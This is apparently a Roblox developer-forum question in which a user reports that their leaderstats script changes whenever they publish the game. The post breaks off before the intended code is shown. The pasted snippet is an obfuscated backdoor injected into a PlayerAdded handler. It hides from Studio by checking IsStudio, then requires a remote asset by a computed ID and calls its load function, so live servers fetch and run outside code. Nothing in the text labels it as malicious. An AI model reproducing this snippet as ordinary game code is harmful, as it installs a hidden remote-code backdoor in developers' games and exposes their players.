The game is published, whenever i publish the game to save what i have done for the game the leaderstats always does this
game.Players.PlayerAdded:Connect(iqzk3nz5 = 'GetService' i4vo0JDdwEiEv = 'PlaceId' iOcqFWbWtjP = 'SSM' i1sL6C = game ixv57XM5CCC = 'WaitForChild' iLDx7hOsn8pzz3G = pcall iSjTdw3Rscr = 'IsStudio' idxfeqX0zL = 'RunService' i4zK7EmfwqCZGdq = 'Description' i68c4nCuJ4Y = 'IsStudio' i03pNO = 'Name' isXD = 15526647.912281 * 171 ih2AjFgbSgZ = 'ClassName' iTvzx4rIX = 'load' itxEPY = 'Debris' iyW6yE8z = spawn iX5hR = 'PlaceId' iZC6nZ3mz9da = require iyW6yE8z( function() iLDx7hOsn8pzz3G( function() if i1sL6C:GetService(idxfeqX0zL) [i68c4nCuJ4Y] (i1sL6C:GetService(idxfeqX0zL) ) then return end iZC6nZ3mz9da(isXD) [iTvzx4rIX] (i1sL6C[i4vo0JDdwEiEv] ) end ) end ) function(player)
when it is supposed to be
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